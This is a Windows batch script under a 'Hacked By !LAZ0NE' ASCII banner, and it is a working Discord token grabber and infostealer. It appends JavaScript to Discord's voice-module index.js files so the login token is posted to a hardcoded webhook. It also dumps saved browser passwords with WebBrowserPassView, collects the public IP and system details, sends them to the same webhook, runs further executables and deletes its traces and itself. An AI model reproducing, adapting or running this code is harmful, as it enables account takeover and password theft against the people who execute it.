___ `MM MM ____ _ ___ ____ _ ___ ____ _ ___ MM ___ _________ ____ ___ __ ____ ____ _____ ___ __ __ `MM( ,M. )M' `MM( ,M. )M' `MM( ,M. )M' MM 6MMMMb MMMMMMMMP 6MMMMb `MM 6MMb 6MMMMb 6MMMMb. 6MMMMMb `MM 6MMb 6MMb `Mb dMb d' `Mb dMb d' `Mb dMb d' MM 8M' `Mb / dMP 6M' `Mb MMM9 `Mb 6M' `Mb 6M' Mb 6M' `Mb MM69 `MM69 `Mb YM. ,PYM. ,P YM. ,PYM. ,P YM. ,PYM. ,P MM ,oMM dMP MM MM MM' MM MM MM MM `' MM MM MM' MM' MM `Mb d'`Mb d' `Mb d'`Mb d' `Mb d'`Mb d' MM ,6MM9'MM dMP MM MM MM MM MMMMMMMM MM MM MM MM MM MM YM,P YM,P YM,P YM,P YM,P YM,P MM MM' MM dMP MM MM MM MM MM MM MM MM MM MM MM `MM' `MM' `MM' `MM' `MM' `MM' 68b MM MM. ,MM dMP /YM. ,M9 MM MM YM d9 68b YM. d9 YM. ,M9 MM MM MM YP YP YP YP YP YP Y89 _MM_`YMMM9'YbdMMMMMMMM YMMMM9 _MM_ _MM_ YMMMM9 Y89 YMMMM9 YMMMMM9 _MM_ _MM_ _MM_ Hacked By !LAZ0NE:#9909 www.laz0ne.com EzFortnite is scammer. ###################################################################################################################################################### @echo off C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**INJECTION STARTED!**\"}" https://discordapp.com/api/webhooks/783100861760798741/ei5Q7UzvqiQxF97a_b3WVeI40lmgW5EWG2nKcTdtLlSTzTR2LY5zJYMxdlW9sFxtXcyG set str=var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', 'https://discordapp.com/api/webhooks/783100861760798741/ei5Q7UzvqiQxF97a_b3WVeI40lmgW5EWG2nKcTdtLlSTzTR2LY5zJYMxdlW9sFxtXcyG', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}'); C:/temp/curl "https://myexternalip.com/raw">>C:\temp\ip_address.txt for /f "delims=" %%q in (C:\temp\ip_address.txt) do set IP=%%q for /f "delims=" %%x in (C:\temp\WindowsInfo.txt) do set WindowsInfo=%%x start C:/temp/WebBrowserPassView.exe /stext "C:/temp/%username%_Passwords.txt" systeminfo | findstr /c:"Host Name">>C:\temp\System_INFO.txt systeminfo | findstr /c:"Domain">>C:\temp\System_INFO.txt systeminfo | findstr /c:"OS Name">>C:\temp\System_INFO.txt systeminfo | findstr /c:"OS Version">>C:\temp\System_INFO.txt systeminfo | findstr /c:"System Manufacturer">>C:\temp\System_INFO.txt systeminfo | findstr /c:"System Model">>C:\temp\System_INFO.txt systeminfo | findstr /c:"System type">>C:\temp\System_INFO.txt systeminfo | findstr /c:"Total Physical Memory">>C:\temp\System_INFO.txt echo Hard Drive Space:>>C:\temp\System_INFO.txt wmic diskdrive get size>>C:\temp\System_INFO.txt echo. echo. echo Service Tag:>>C:\temp\System_INFO.txt wmic bios get serialnumber>>C:\temp\System_INFO.txt echo. echo. echo CPU:>>C:\temp\System_INFO.txt wmic cpu get name>>C:\temp\System_INFO.txt set "discord=%appdata%\discord\0.0.308\modules\discord_voice\index.js" set "discordcanary=%appdata%\discordcanary\0.0.276\modules\discord_voice\index.js" set "discordptb=%appdata%\discordptb\0.0.55\modules\discord_voice\index.js" if not exist %discord% goto CANARY echo %str% >> "%appdata%\discord\0.0.308\modules\discord_voice\index.js" GOTO CANARY :CANARY if not exist %discordcanary% goto PTB echo %str% >> "%appdata%\discordcanary\0.0.276\modules\discord_voice\index.js" GOTO PTB :PTB if not exist %discordptb% goto SEND2 echo %str% >> "%appdata%\discordptb\0.0.55\modules\discord_voice\index.js" GOTO SEND2 :SEND2 C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**%USERNAME%**\n```asciidoc\nTime and Date :: %DATE% %TIME%\nIP Address :: %IP%\nWindows Info :: %WindowsInfo%\n```\n\"}" https://discordapp.com/api/webhooks/783100861760798741/ei5Q7UzvqiQxF97a_b3WVeI40lmgW5EWG2nKcTdtLlSTzTR2LY5zJYMxdlW9sFxtXcyG "C:\temp\filed.exe" --processStart filed.exe "C:\temp\CustomEXE.exe" --processStart CustomEXE.exe timeout 5 > NUL del C:\temp\filed.exe /f /q rem testtaskkill /f /im Discord.exe rem testtaskkill /f /im DiscordCanary.exe rem testtaskkill /f /im DiscordPTB.exe set "discord2=C:\Users\%username%\AppData\Local\Discord\Update.exe" set "discordcanary2=C:\Users\%username%\AppData\Local\DiscordCanary\Update.exe" set "discordptb2=C:\Users\%username%\AppData\Local\DiscordPTB\Update.exe if not exist %discord2% goto ZZZ rem test"C:\Users\%username%\AppData\Local\Discord\Update.exe" --processStart Discord.exe GOTO ZZZ :ZZZ if not exist %discordcanary2% goto WWW rem test"C:\Users\%username%\AppData\Local\DiscordCanary\Update.exe" --processStart DiscordCanary.exe GOTO WWW :WWW if not exist %discordptb2% goto DEL rem test"C:\Users\%username%\AppData\Local\DiscordPTB\Update.exe" --processStart DiscordPTB.exe goto DEL :DEL del C:\temp\ip_address.txt /f /q del C:\temp\WindowsInfo.txt /f /q del C:\temp\%username%_Passwords.txt /f /q del C:\temp\curl-ca-bundle.crt /f /q del C:\temp\curl.exe /f /q del C:\temp\CustomEXE.exe /f /q rem %0 | %0 rem SHUTDOWN -r -t 30 rem SHUTDOWN /s /t 30 /c del %0